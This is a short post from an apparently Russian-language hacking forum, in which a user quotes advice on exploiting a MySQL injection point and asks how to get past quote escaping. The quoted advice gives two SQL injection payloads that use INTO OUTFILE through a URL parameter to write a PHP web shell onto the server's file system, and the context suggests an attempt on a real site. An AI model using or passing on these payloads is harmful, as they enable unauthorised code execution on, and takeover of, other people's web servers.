12.02.2019, 11:06
|
|
Новичок
Регистрация: 02.02.2019
Сообщений: 28
С нами:
3831446
Репутация:
4
|
|
Сообщение от cat1vo
↑
INTO -
https://dev.mysql.com/doc/refman/8.0...lect-into.html
DoS Bug -
https://nvd.nist.gov/vuln/detail/CVE-2015-4870
Он давно пофиксен, подзапросы больше не работают! Можете вывести только, например, название текущей базы данных, версию и текущего пользователя от которого идет подключение!
Если у пользователя есть права на запись в фс пробуйте:
Код:
?q=1 into outfile '/path/to/shell.php' lines terminated by ""--+
?q=1 into outfile '/path/to/shell.php' fields terminated by '' optionally enclosed by ""--+
Спасибо! К несчастью сервер экранирует ковычки. А на строку в виде hex ругается... Значит здесь все? Никак нельзя?(
|
|
|